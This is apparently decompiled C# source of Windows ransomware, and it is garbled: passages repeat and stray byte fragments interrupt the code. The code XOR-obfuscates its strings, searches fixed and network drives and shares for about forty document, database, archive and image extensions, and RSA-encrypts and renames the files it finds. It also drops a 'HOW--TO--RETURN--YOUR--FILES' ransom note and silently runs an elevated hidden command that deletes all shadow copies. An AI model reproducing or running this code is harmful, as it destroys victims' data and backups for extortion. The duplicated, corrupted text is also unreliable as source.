this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xff, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf4, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf2, 0xf2, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 0xe5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xf4, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 230 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xf7 }, this.X)); /* * : .cd.ldf .mdf .max .dbf .epf .1cd .md .db .pdf .ppt .xls .doc .arj .tar .7z .rar .zip .tif .jpg .ai .bmp .png .cdr .psd .jpeg .docx .xlsx .pptx .accdb .mdb .rtf .odt .ods .odb .odg .cr2 .nef .nrf .orf .arw .sr2 .srf */ // List<string> list = new List<string>(); Process process = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view", RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { bool flag4; process.Start(); string str4 = process.StandardOutput.ReadToEnd(); int startIndex = 0; int index = 0; goto Label_0A8B; Label_0A48: startIndex = str4.IndexOf('\\', startIndex); if (startIndex == -1) { goto Label_0A98; } index = str4.IndexOf(' ', startIndex); list.Add(str4.Substring(startIndex, index - startIndex)); startIndex = index; Label_0A8B: flag4 = true; goto Label_0A48; } catch { } Label_0A98: num5 = 0; while (num5 < list.Count) { Process process2 = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view " + list[num5], RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { process2.Start(); string s = process2.StandardOutput.ReadToEnd(); byte[] bytes = Encoding.GetEncoding(0x4e3).GetBytes(s); char[] separator = new char[] { '\r', '\n' }; string[] strArray = Encoding.GetEncoding("CP866").GetString(bytes).Split(separator); for (int j = 0; j < strArray.Length; j++) { if (strArray[j].IndexOf("") > -1) { this.FullList.Add(list[num5] + @"\" + strArray[j].Substring(0, strArray[j].IndexOf(""))); } } } catch { } num5++; } /// ...RSA 2048 RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); this.publicKey = provider.ToXmlString(false); // XML this.privateKey = this.CryptKey(provider.ToXmlString(true)); // ... } ///// ssda.far private void SaveKey(string f, string k) { string str = this.keyfile.Substring(0, this.keyfile.Length - 4); if (!File.Exists(f + @"\" + this.keyfile)) { try { File.WriteAllText(f + @"\" + this.keyfile, k); } catch { } } else { try { File.WriteAllText(string.Concat(new object[] { f, @"\", str, this.AmountFiles(f), ".", this.kfExt }), k); } catch { } } } ///// private void SaveNotes() { List<string> list = new List<string> { // Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), // Environment.GetFolderPath(Environment.SpecialFolder.Personal) // }; for (int i = 0; i < list.Count; i++) // { this.SaveKey(list[i], this.privateKey); // ssda.far this.AddNote(list[i]); // } } ///// private void GetDirs(DirectoryInfo pth) { try { DirectoryInfo[] directories = pth.GetDirectories(); foreach (DirectoryInfo info in directories) { this.GetFiles(info); this.GetDirs(info); } } catch { } } ///// private void GetDrives() { try { string[] logicalDrives = Environment.GetLogicalDrives(); for (int i = 0; i < logicalDrives.Length; i++) { DriveInfo info = new DriveInfo(logicalDrives[i]); if ((info.DriveType == DriveType.Fixed) || (info.DriveType == DriveType.Network)) { this.GetDirs(info.RootDirectory); } } } catch { } } //// ... private void GetFiles(DirectoryInfo folder) { try { string[] files = Directory.GetFiles(folder.FullName, "*.*"); foreach (string str in files) { foreach (string str2 in this.extensions) // { if ((str.ToLower().IndexOf(str2) > -1) && (str.ToLower().IndexOf(str2 + ".") == -1)) { string str3 = str; if (str.IndexOf(this.vNF) == -1) { this.CF(str3); /// ... } } } } } catch { } } } } , 0xe5, 0xf3, namespace nekema { public class Form1 : Form { private int blocksize = 0xf5; //245 . private IContainer components = null; private List<string> extensions = new List<string>(); // private List<string> FullList = new List<string>(); // private string keyCode; // . . private string keyfile = ""; // "ssda.far" private string kfExt = ""; // "far" private string kfName = ""; // "ssda" private static readonly int MAX_PATH = 260; // private string pbK = ""; // . private string privateKey = ""; // private string publicKey = ""; // . private int repeatCount = 3; // private List<string> SpecFolders = new List<string>(); private string vNF = ""; // HOW--TO--RETURN--YOUR--FILES.jpg private byte X = 0x91; // // DEXOR = 145 ////// HOW--TO--RETURN--YOUR--FILES.jpg private void AddNote(string f) { string currentDirectory = Environment.CurrentDirectory; if (f != currentDirectory) { try { if (!File.Exists(f + @"\" + this.vNF)) { Resources.ne5.Save(f + @"\" + this.vNF); } } catch { } } } //////// - private void CF(string f1) { byte[] destinationArray = new byte[this.blocksize]; try { byte[] sourceArray = File.ReadAllBytes(f1); if ((sourceArray.Length / (this.repeatCount + 5)) >= this.blocksize) { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.publicKey); byte[] buffer3 = new byte[sourceArray.Length + (this.repeatCount * 11)]; byte[] buffer4 = new byte[sourceArray.Length - (this.repeatCount * this.blocksize)]; for (int i = 0; i < this.repeatCount; i++) { Array.Copy(sourceArray, this.blocksize * i, destinationArray, 0, this.blocksize); byte[] buffer5 = provider.Encrypt(destinationArray, false); Array.Copy(buffer5, 0, buffer3, i * (this.blocksize + 11), buffer5.Length); } Array.Copy(sourceArray, this.repeatCount * this.blocksize, buffer4, 0, buffer4.Length); Array.Copy(buffer4, 0, buffer3, this.repeatCount * (this.blocksize + 11), buffer4.Length); try { File.WriteAllBytes(f1, buffer3); File.Move(f1, f1 + this.keyCode); } catch { } } } catch { } } ////// - private string CryptKey(string s) { string str = ""; byte[] array = new byte[s.Length]; byte[] destinationArray = new byte[this.blocksize]; byte[] bytes = new byte[this.blocksize + 11]; double num = Math.Ceiling((double) (((double) s.Length) / ((double) this.blocksize))); if (s.Length < (num * this.blocksize)) { int length = s.Length; for (int i = 0; i < ((num * this.blocksize) - length); i++) { s = s + " "; } } array = Encoding.Default.GetBytes(s); Array.Reverse(array); try { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.pbK); for (int j = 0; j < num; j++) { Array.Copy(array, j * this.blocksize, destinationArray, 0, this.blocksize); bytes = provider.Encrypt(destinationArray, false); str = str + Encoding.Default.GetString(bytes); } } catch { } return str; } ///// private void DelS() { byte[] a = new byte[] { 0xe7, 0xe2, 0xe2, 240, 0xf5, 0xfc, 0xf8, 0xff, 0xbf, 0xf4, 0xe9, 0xf4 }; byte[] buffer2 = new byte[] { 0xd5, 0xf4, 0xfd, 0xf4, 0xe5, 0xf4, 0xb1, 0xc2, 0xf9, 240, 0xf5, 0xfe, 230, 0xe2, 0xb1, 190, 0xd0, 0xfd, 0xfd, 0xb1, 190, 0xc0, 0xe4, 0xf8, 0xf4, 0xe5 }; Process process = new Process { StartInfo = { FileName = this.DeXOR(a, this.X), Arguments = this.DeXOR(buffer2, this.X), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, UseShellExecute = true, Verb = "runas" } }; try { process.Start(); } catch { } } ///// XOR private string DeXOR(byte[] A, int x) { string str = ""; byte[] bytes = new byte[A.Length]; for (int i = 0; i < A.Length; i++) { bytes[i] = (byte) (A[i] ^ x); } return (str = Encoding.Default.GetString(bytes)); } ///// . private void Init() { this.Prep(); // this.SaveNotes(); // this.GetDrives(); // this.NetScan(); // this.SetDesktopWallpaper(); // , } private void Prep() { int num5; // a = ssda.far byte[] a = new byte[] { 0xe2, 0xe2, 0xf5, 240, 0xbf, 0xf7, 240, 0xe3 }; //buffer2 = HOW--TO--RETURN--YOUR--FILES.jpg byte[] buffer2 = new byte[] {0xd9, 0xde, 0xc6, 0xbc, 0xbc, 0xc5, 0xde, 0xbc, 0xbc, 0xc3, 0xd4, 0xc5, 0xc4, 0xc3, 0xdf, 0xbc, 0xbc, 200, 0xde, 0xc4, 0xc3, 0xbc, 0xbc, 0xd7, 0xd8, 0xdd, 0xd4, 0xc2, 0xbf, 0xfb, 0xe1, 0xf6}; //buffer3 = <RSAKeyValue <Modulus>+fFYiO9CH9iZwwzlsQ3X+qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W+72/TjzHkuPp2W/RC7FBC4JpgguCi4x4ye4HEwRkQ75tHhig08hRKm1a7wlwYl8zLAzM8AwTPLh770MOzPqF1fJMKZCAtdUgIKdYNAkrP18sRbshkGNjwjMhMLNbKTaYfo3qIS4vtVUQtcw+g9ys3ZFZetKEl0ZMJEp4X7b4HK9vqUohPBYfBszXY6ion5m5tSSfhJK6OX2HPaU6RDcajTeEcmk9it9x73drJleZ1G+tVgL6duLX/uOWPVyi0rhyvYmRrGNcIQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> byte[] buffer3 = new byte[] { 0xad, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf, 0xad, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xba, 0xf7, 0xd7, 200, 0xf8, 0xde, 0xa8, 210, 0xd9, 0xa8, 0xf8, 0xcb, 230, 230, 0xeb, 0xfd, 0xe2, 0xc0, 0xa2, 0xc9, 0xba, 0xe0, 0xcb, 0xa6, 0xc4, 0xe8, 0xe9, 0xa3, 0xa8, 0xa1, 0xde, 0xf9, 0xcb, 160, 0xc6, 0xe7, 0xdd, 0xe5, 0xa7, 0xf2, 0xfc, 0xd5,0xf5, 0xa4, 0xfe, 0xc3, 0xe2, 0xdd, 0xfe, 0xd9, 0xdd, 0xff, 0xfe, 0xd6, 230, 0xe2, 160, 210,0xc6, 0xd7, 220, 0xde, 0xd6, 0xd7, 0xfb, 0xe5, 0xf3, 240, 0xc3, 0xde, 0xc2, 250, 0xc5, 0xf6, 0xa2, 0xc6, 0xba, 0xa6, 0xa3, 190, 0xc5, 0xfb, 0xeb, 0xd9, 250, 0xe4, 0xc1, 0xe1, 0xa3, 0xc6,190, 0xc3, 210, 0xa6, 0xd7, 0xd3, 210, 0xa5, 0xdb, 0xe1, 0xf6, 0xf6, 0xe4, 210, 0xf8, 0xa5, 0xe9, 0xa5, 0xe8, 0xf4, 0xa5, 0xd9, 0xd4, 230, 0xc3, 250, 0xc0, 0xa6, 0xa4, 0xe5, 0xd9, 0xf9, 0xf8, 0xf6, 0xa1, 0xa9, 0xf9, 0xc3, 0xda, 0xfc, 160, 240, 0xa6, 230, 0xfd, 230, 200, 0xfd, 0xa9, 0xeb, 0xdd, 0xd0, 0xeb, 220, 0xa9, 0xd0, 230, 0xc5, 0xc1, 0xdd, 0xf9, 0xa6, 0xa6, 0xa1, 220, 0xde, 0xeb, 0xc1, 0xe0, 0xd7, 160, 0xf7, 0xdb, 220, 0xda, 0xcb, 210, 0xd0, 0xe5, 0xf5, 0xc4, 0xf6, 0xd8, 0xda, 0xf5, 200, 0xdf, 0xd0, 250, 0xe3, 0xc1, 160, 0xa9, 0xe2, 0xc3, 0xf3, 0xe2, 0xf9, 250, 0xd6, 0xdf, 0xfb, 230, 0xfb, 220, 0xf9, 220, 0xdd, 0xdf, 0xf3, 0xda, 0xc5, 240, 200, 0xf7, 0xfe, 0xa2, 0xe0, 0xd8, 0xc2, 0xa5, 0xe7, 0xe5, 0xc7, 0xc4, 0xc0, 0xe5, 0xf2, 230, 0xba, 0xf6, 0xa8, 0xe8, 0xe2, 0xa2, 0xcb, 0xd7, 0xcb, 0xf4, 0xe5, 0xda, 0xd4, 0xfd, 0xa1, 0xcb, 220, 0xdb, 0xd4, 0xe1, 0xa5, 0xc9, 0xa6, 0xf3, 0xa5, 0xd9, 0xda, 0xa8, 0xe7, 0xe0, 0xc4, 0xfe, 0xf9, 0xc1, 0xd3, 200, 0xf7, 0xd3, 0xe2, 0xeb, 0xc9, 200, 0xa7, 0xf8, 0xfe, 0xff, 0xa4, 0xfc, 0xa4, 0xe5, 0xc2, 0xc2, 0xf7, 0xf9, 0xdb, 0xda, 0xa7, 0xde, 0xc9, 0xa3, 0xd9, 0xc1, 240, 0xc4, 0xa7, 0xc3, 0xd5, 0xf2, 240, 0xfb, 0xc5, 0xf4, 0xd4, 0xf2, 0xfc, 250, 0xa8, 0xf8, 0xe5, 0xa8, 0xe9, 0xa6, 0xa2, 0xf5, 0xe3, 0xdb, 0xfd, 0xf4, 0xcb, 160, 0xd6, 0xba, 0xe5, 0xc7, 0xf6, 0xdd, 0xa7, 0xf5, 0xe4, 0xdd, 0xc9, 190, 0xe4, 0xde, 0xc6, 0xc1, 0xc7, 0xe8, 0xf8, 0xa1, 0xe3, 0xf9, 0xe8, 0xe7, 200, 0xfc, 0xc3, 0xe3, 0xd6, 0xdf, 0xf2, 0xd8, 0xc0, 0xac, 0xac, 0xad, 190, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xad, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xd0, 0xc0, 0xd0, 0xd3, 0xad, 190, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xad, 190, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf}; // Windows Vista - . if (Environment.OSVersion.Version.Major > 5) { new Thread(new ThreadStart(this.DelS)).Start(); } // ... this.pbK = this.DeXOR(buffer3, this.X); string str = this.DeXOR(buffer2, this.X); this.vNF = this.DeXOR(buffer2, this.X); this.keyfile = this.DeXOR(a, this.X); this.kfExt = this.RetFExt(this.keyfile); this.kfName = this.RetFName(this.keyfile); this.keyCode = "."; // Random random = new Random(); random.Next(0x61, 0x7a); for (int i = 0; i < 1; i++) { this.keyCode = this.keyCode + Convert.ToChar(random.Next(0x61, 0x7a)).ToString(); } string[] textArray1 = new string[] { this.keyCode, (DateTime.Now.Day + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), (DateTime.Now.Month + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString() }; this.keyCode = string.Concat(textArray1); // ... // ... string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System); folderPath = folderPath.Substring(0, folderPath.ToLower().IndexOf(@"\system")); string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles); this.SpecFolders.Add(folderPath.ToLower()); this.SpecFolders.Add(str3.ToLower()); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xc3 }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xb5, 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xbf, 0xd3, 0xd8, 0xdf }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc2, 0xe8, 0xe2, 0xe5, 0xf4, 0xfc, 0xb1, 0xc7, 0xfe, 0xfd, 0xe4, 0xfc, 0xf4, 0xb1, 0xd8, 0xff, 0xf7, 0xfe, 0xe3, 0xfc, 240, 0xe5, 0xf8, 0xfe, 0xff }, this.X)); /* ... c:\windows c:\program files (x86) RECYCLER $RECYCLE.BIN System Volume Information */ /// this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfd, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 240, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf4, 0xe1, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 160, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 0xfb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xa6, 0xeb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xeb, 0xf8, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 0xf8, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf8 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf3, 0xfc, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xff, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf4, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf2, 0xf2, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 0xe5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xf4, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 230 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xf7 }, this.X)); /* * : .cd.ldf .mdf .max .dbf .epf .1cd .md .db .pdf .ppt .xls .doc .arj .tar .7z .rar .zip .tif .jpg .ai .bmp .png .cdr .psd .jpeg .docx .xlsx .pptx .accdb .mdb .rtf .odt .ods .odb .odg .cr2 .nef .nrf .orf .arw .sr2 .srf */ // List<string> list = new List<string>(); Process process = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view", RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { bool flag4; process.Start(); string str4 = process.StandardOutput.ReadToEnd(); int startIndex = 0; int index = 0; goto Label_0A8B; Label_0A48: startIndex = str4.IndexOf('\\', startIndex); if (startIndex == -1) { goto Label_0A98; } index = str4.IndexOf(' ', startIndex); list.Add(str4.Substring(startIndex, index - startIndex)); startIndex = index; Label_0A8B: flag4 = true; goto Label_0A48; } catch { } Label_0A98: num5 = 0; while (num5 < list.Count) { Process process2 = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view " + list[num5], RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { process2.Start(); string s = process2.StandardOutput.ReadToEnd(); byte[] bytes = Encoding.GetEncoding(0x4e3).GetBytes(s); char[] separator = new char[] { '\r', '\n' }; string[] strArray = Encoding.GetEncoding("CP866").GetString(bytes).Split(separator); for (int j = 0; j < strArray.Length; j++) { if (strArray[j].IndexOf("") > -1) { this.FullList.Add(list[num5] + @"\" + strArray[j].Substring(0, strArray[j].IndexOf(""))); } } } catch { } num5++; } /// ...RSA 2048 RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); this.publicKey = provider.ToXmlString(false); // XML this.privateKey = this.CryptKey(provider.ToXmlString(true)); // ... } ///// ssda.far private void SaveKey(string f, string k) { string str = this.keyfile.Substring(0, this.keyfile.Length - 4); if (!File.Exists(f + @"\" + this.keyfile)) { try { File.WriteAllText(f + @"\" + this.keyfile, k); } catch { } } else { try { File.WriteAllText(string.Concat(new object[] { f, @"\", str, this.AmountFiles(f), ".", this.kfExt }), k); } catch { } } } ///// private void SaveNotes() { List<string> list = new List<string> { // Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), // Environment.GetFolderPath(Environment.SpecialFolder.Personal) // }; for (int i = 0; i < list.Count; i++) // { this.SaveKey(list[i], this.privateKey); // ssda.far this.AddNote(list[i]); // } } ///// private void GetDirs(DirectoryInfo pth) { try { DirectoryInfo[] directories = pth.GetDirectories(); foreach (DirectoryInfo info in directories) { this.GetFiles(info); this.GetDirs(info); } } catch { } } ///// private void GetDrives() { try { string[] logicalDrives = Environment.GetLogicalDrives(); for (int i = 0; i < logicalDrives.Length; i++) { DriveInfo info = new DriveInfo(logicalDrives[i]); if ((info.DriveType == DriveType.Fixed) || (info.DriveType == DriveType.Network)) { this.GetDirs(info.RootDirectory); } } } catch { } } //// ... private void GetFiles(DirectoryInfo folder) { try { string[] files = Directory.GetFiles(folder.FullName, "*.*"); foreach (string str in files) { foreach (string str2 in this.extensions) // { if ((str.ToLower().IndexOf(str2) > -1) && (str.ToLower().IndexOf(str2 + ".") == -1)) { string str3 = str; if (str.IndexOf(this.vNF) == -1) { this.CF(str3); /// ... } } } } } catch { } } } } 0xa6, 0xa3, namespace nekema { public class Form1 : Form { private int blocksize = 0xf5; //245 . private IContainer components = null; private List<string> extensions = new List<string>(); // private List<string> FullList = new List<string>(); // private string keyCode; // . . private string keyfile = ""; // "ssda.far" private string kfExt = ""; // "far" private string kfName = ""; // "ssda" private static readonly int MAX_PATH = 260; // private string pbK = ""; // . private string privateKey = ""; // private string publicKey = ""; // . private int repeatCount = 3; // private List<string> SpecFolders = new List<string>(); private string vNF = ""; // HOW--TO--RETURN--YOUR--FILES.jpg private byte X = 0x91; // // DEXOR = 145 ////// HOW--TO--RETURN--YOUR--FILES.jpg private void AddNote(string f) { string currentDirectory = Environment.CurrentDirectory; if (f != currentDirectory) { try { if (!File.Exists(f + @"\" + this.vNF)) { Resources.ne5.Save(f + @"\" + this.vNF); } } catch { } } } //////// - private void CF(string f1) { byte[] destinationArray = new byte[this.blocksize]; try { byte[] sourceArray = File.ReadAllBytes(f1); if ((sourceArray.Length / (this.repeatCount + 5)) >= this.blocksize) { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.publicKey); byte[] buffer3 = new byte[sourceArray.Length + (this.repeatCount * 11)]; byte[] buffer4 = new byte[sourceArray.Length - (this.repeatCount * this.blocksize)]; for (int i = 0; i < this.repeatCount; i++) { Array.Copy(sourceArray, this.blocksize * i, destinationArray, 0, this.blocksize); byte[] buffer5 = provider.Encrypt(destinationArray, false); Array.Copy(buffer5, 0, buffer3, i * (this.blocksize + 11), buffer5.Length); } Array.Copy(sourceArray, this.repeatCount * this.blocksize, buffer4, 0, buffer4.Length); Array.Copy(buffer4, 0, buffer3, this.repeatCount * (this.blocksize + 11), buffer4.Length); try { File.WriteAllBytes(f1, buffer3); File.Move(f1, f1 + this.keyCode); } catch { } } } catch { } } ////// - private string CryptKey(string s) { string str = ""; byte[] array = new byte[s.Length]; byte[] destinationArray = new byte[this.blocksize]; byte[] bytes = new byte[this.blocksize + 11]; double num = Math.Ceiling((double) (((double) s.Length) / ((double) this.blocksize))); if (s.Length < (num * this.blocksize)) { int length = s.Length; for (int i = 0; i < ((num * this.blocksize) - length); i++) { s = s + " "; } } array = Encoding.Default.GetBytes(s); Array.Reverse(array); try { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.pbK); for (int j = 0; j < num; j++) { Array.Copy(array, j * this.blocksize, destinationArray, 0, this.blocksize); bytes = provider.Encrypt(destinationArray, false); str = str + Encoding.Default.GetString(bytes); } } catch { } return str; } ///// private void DelS() { byte[] a = new byte[] { 0xe7, 0xe2, 0xe2, 240, 0xf5, 0xfc, 0xf8, 0xff, 0xbf, 0xf4, 0xe9, 0xf4 }; byte[] buffer2 = new byte[] { 0xd5, 0xf4, 0xfd, 0xf4, 0xe5, 0xf4, 0xb1, 0xc2, 0xf9, 240, 0xf5, 0xfe, 230, 0xe2, 0xb1, 190, 0xd0, 0xfd, 0xfd, 0xb1, 190, 0xc0, 0xe4, 0xf8, 0xf4, 0xe5 }; Process process = new Process { StartInfo = { FileName = this.DeXOR(a, this.X), Arguments = this.DeXOR(buffer2, this.X), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, UseShellExecute = true, Verb = "runas" } }; try { process.Start(); } catch { } } ///// XOR private string DeXOR(byte[] A, int x) { string str = ""; byte[] bytes = new byte[A.Length]; for (int i = 0; i < A.Length; i++) { bytes[i] = (byte) (A[i] ^ x); } return (str = Encoding.Default.GetString(bytes)); } ///// . private void Init() { this.Prep(); // this.SaveNotes(); // this.GetDrives(); // this.NetScan(); // this.SetDesktopWallpaper(); // , } private void Prep() { int num5; // a = ssda.far byte[] a = new byte[] { 0xe2, 0xe2, 0xf5, 240, 0xbf, 0xf7, 240, 0xe3 }; //buffer2 = HOW--TO--RETURN--YOUR--FILES.jpg byte[] buffer2 = new byte[] {0xd9, 0xde, 0xc6, 0xbc, 0xbc, 0xc5, 0xde, 0xbc, 0xbc, 0xc3, 0xd4, 0xc5, 0xc4, 0xc3, 0xdf, 0xbc, 0xbc, 200, 0xde, 0xc4, 0xc3, 0xbc, 0xbc, 0xd7, 0xd8, 0xdd, 0xd4, 0xc2, 0xbf, 0xfb, 0xe1, 0xf6}; //buffer3 = <RSAKeyValue 